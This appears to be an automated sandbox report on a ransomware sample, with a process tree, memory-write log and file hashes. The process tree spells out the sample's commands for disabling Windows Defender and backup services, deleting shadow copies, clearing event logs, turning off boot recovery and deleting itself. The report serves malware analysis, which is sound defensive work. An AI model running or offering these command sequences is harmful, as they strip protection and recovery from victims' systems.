05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2940 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2876 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2876 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 1200 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 1200 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 1420 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 1420 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2364 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2364 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 4036 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 4036 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 1948 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 1948 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2172 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2172 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2696 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2696 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe sc.exe PID 2672 wrote to memory of 2804 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 2804 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 3124 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 3124 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 2096 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 2096 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 2664 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 2664 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 1388 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe PID 2672 wrote to memory of 1388 2672 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:696
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1352
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:492
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3032
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3276
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2744
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:340
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1256
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_13728" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13728" /y3⤵PID:1016
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:2940
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2876
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1200
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1420
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2364
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:4036
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1948
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2172
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_13728" start= disabled2⤵PID:2696
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2804
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3124
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2096
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2664
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1388
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4020
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3644
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2024
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3048
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2724
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1044
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1208
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1212
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3156
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3036
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3940
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3748
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2740
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1988
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1676
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:4060
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2732
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1424
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3516
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1384 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1808 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1976 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1844
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3064
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:836
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1040
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3300 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3744
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2340 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:644 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3260 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1628 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1592 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1204
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3556 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2288 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\LdBi_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4016 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe"2⤵PID:3032
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3664
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
2469f433dd1295e9de4cc5a6ba3d64a6
SHA1bba5c9434767bcd44dcc93e710ed373b549ca916
SHA2564cc7a84e3263a14bd0fcd4df8be8e316c50cc95bbdac41398f11290e9d9d60f9
SHA51239c4240f137da1697eb399e966d05596dddbf771aafdfcbd78984def8130dfeebfab681ea48d0d6b3fe0cefb724f3392706a2c38a734998ff6e5a1f3d686b4a4
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
c7d44c2c3add39adac76536497f7a89f
SHA1e48551cefc96f73e6fa80d2e4559298e7de16882
SHA2568108c55432d74c7adb351ea1404c5ac5666eb853e315a4cf1f430286c328a784
SHA512a8c06e11c8585ac8d84b340fe1bf2d6608663084976ebf0a42bfa03d030c136029abf2b6d887665a4c533165d3fe16db1246e11522c35d94155dd65290032f0e